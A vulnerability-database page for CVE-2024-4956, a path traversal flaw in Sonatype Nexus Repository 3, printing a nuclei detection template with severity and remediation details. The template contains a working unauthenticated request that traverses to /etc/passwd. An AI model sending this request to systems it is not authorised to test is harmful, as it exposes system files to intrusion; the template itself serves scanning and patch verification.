Lucene search
K

Sonatype Nexus Repository Manager 3 - Local File Inclusion

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 424 Views

Sonatype Nexus Repository Manager 3 - Local File Inclusion vulnerability, allowing unauthenticated attacker to read system files. Fixed in version 3.68.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2024-4956
23 May 202411:39
githubexploit
GithubExploit
Exploit for CVE-2024-4956
23 May 202406:47
githubexploit
GithubExploit
Exploit for CVE-2024-4956
23 May 202406:47
githubexploit
GithubExploit
Exploit for CVE-2024-4956
14 Aug 202416:41
githubexploit
GithubExploit
Exploit for CVE-2024-4956
12 Dec 202404:05
githubexploit
GithubExploit
Exploit for CVE-2024-4956
26 Sep 202415:05
githubexploit
GithubExploit
Exploit for CVE-2024-4956
9 Jun 202410:57
githubexploit
GithubExploit
Exploit for CVE-2024-4956
5 Jun 202415:37
githubexploit
GithubExploit
Exploit for CVE-2024-4956
26 May 202406:50
githubexploit
GithubExploit
Exploit for CVE-2024-4956
28 May 202415:05
githubexploit
Rows per page
id: CVE-2024-4956

info:
  name: Sonatype Nexus Repository Manager 3 - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
  impact: |
    Unauthenticated attackers can read arbitrary system files via path traversal in Sonatype Nexus Repository.
  remediation: |
    Update Sonatype Nexus Repository 3 to version 3.68.1 or later.
  reference:
    - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4956
    - https://support.sonatype.com/hc/en-us/articles/29416509323923
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-4956
    cwe-id: CWE-22
    epss-score: 0.18245
    epss-percentile: 0.96863
    cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sonatype
    product: nexus
    fofa-query:
      - title="Nexus Repository Manager"
      - title="nexus repository manager"
  tags: cve,cve2024,nexus,lfi,sonatype,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(header, "application/octet-stream")
          - status_code == 200
        condition: and
# digest: 490a0046304402207ee90ebe316afc4c2610221caa879f3ea4618c6c8b35831b5da52ec60121b26f0220280df3057b12d70bc053ebecaad791b3810068bba8cb42a2719d4352b5525779:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
EPSS0.18245
SSVC
424